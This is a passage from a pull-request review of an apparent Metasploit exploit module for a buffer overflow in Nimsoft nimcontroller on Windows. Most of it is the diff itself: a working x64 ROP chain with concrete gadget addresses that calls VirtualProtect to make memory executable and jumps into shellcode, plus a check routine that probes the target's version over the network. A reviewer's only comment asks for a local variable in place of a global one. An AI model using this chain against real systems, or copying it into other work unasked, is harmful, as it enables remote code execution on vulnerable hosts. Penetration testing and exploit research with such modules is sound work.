modules/exploits/windows/nimsoft/nimcontroller_bof.rb

```diff
@@ -0,0 +1,460 @@
+                    0x0000000000000000,       #
+                    0x0000000000000000,       #
+                    0x0000000000000000,       #
+                    0x0000000000000000,       #
+                    0x0000000000000000,       #
+                    0x0000000000000000]       #
+    rop_gadgets += [0x0000000140018c42] * 10  # ret
+    rop_gadgets += [0x0000000140131643,       # pop rcx ; ret
+                    0x000000000000059f,       # (offset to *shellcode)
+                    0x000000014006d8d8]       # add rax, rcx ; add rsp, 0x38 ; ret
+    rop_gadgets += [0x0000000140018c42] * 15  # ret
+    rop_gadgets += [0x00000001400b741b]       # xchg eax, ecx ; ret
+    rop_gadgets += [0x00000001400496a2,       # pop rdx ; ret
+                    0x00000000000005dc]       # dwSize
+    rop_gadgets += [0x00000001400bc39c,       # pop r8 ; ret
+                    0x0000000000000040]       # flNewProtect
+    rop_gadgets += [0x00000001400c5f8a]       # mov rax, r11 ; add rsp, 0x38 ; ret (RESTORE VirtualProtectStub)
+    rop_gadgets += [0x0000000140018c42] * 17  # ret
+    rop_gadgets += [0x00000001400a0b55]       # call rax ; mov rdp qword ptr [rsp+48h] ; mov rsi, qword ptr [rsp+50h] ; mov rax, rbx ; mov rbx, qword ptr [rsp + 40h] ; add rsp,30h ; pop rdi ; ret
+    rop_gadgets += [0x0000000140018c42] * 20  # ret
+
+    rop_gadgets += [0x0000000140002ef6,       # pop rax ; ret (CALL COMPLETE, "JUMP" INTO OUR SHELLCODE)
+                    0x0000000000000000,       # (zero out rax)
+                    0x00000001400eade1,       # mov eax, esp ; add rsp, 0x30 ; pop r13 ; pop r12 ; pop rbp ; ret
+                    0x0000000000000000,       #
+                    0x0000000000000000,       #
+                    0x0000000000000000,       #
+                    0x0000000000000000,       #
+                    0x0000000000000000,       #
+                    0x0000000000000000]       #
+    rop_gadgets += [0x0000000140018c42] * 10  # ret
+    rop_gadgets += [0x0000000140131643,       # pop rcx ; ret
+                    0x0000000000000317,       # (offset to our shellcode)
+                    0x000000014006d8d8]       # add rax, rcx ; add rsp, 0x38 ; ret
+    rop_gadgets += [0x0000000140018c42] * 15  # ret
+    rop_gadgets += [0x00000001400a9747]       # jmp rax
+    rop_gadgets += [0x0000000140018c42] * 20  # ret (do not remove)
+
+    return rop_gadgets.pack("<Q*")
+
+  end
+
+  # check: there are only two prerequisites to getting code execution. The version number
+  # and access to the directory_list probe. The easiest way to get this information is to
+  # ask nicely ;)
+  def check
+
+    connect
+
+    sock.put(generate_probe("get_info", ["interfaces=0"]))
+    response = sock.get_once(4096)
+
+    $i = 0
+    check = 0
+    target_version = ""
+    info = response.split("\x00")
+
+    while $i < info.length
+      if "version".in? info[$i]
+        target_version = info[$i+3]
+        break
+      end
+      $i +=1
+    end
```

Comment:
There does not appear to be any requirement to use a global variable `$i` here.

```suggestion
    i = 0
    check = 0
    target_version = ""
    info = response.split("\x00")

    while i < info.length
      if "version".in? info[i]
        target_version = info[i+3]
        break
      end
      i +=1
    end
```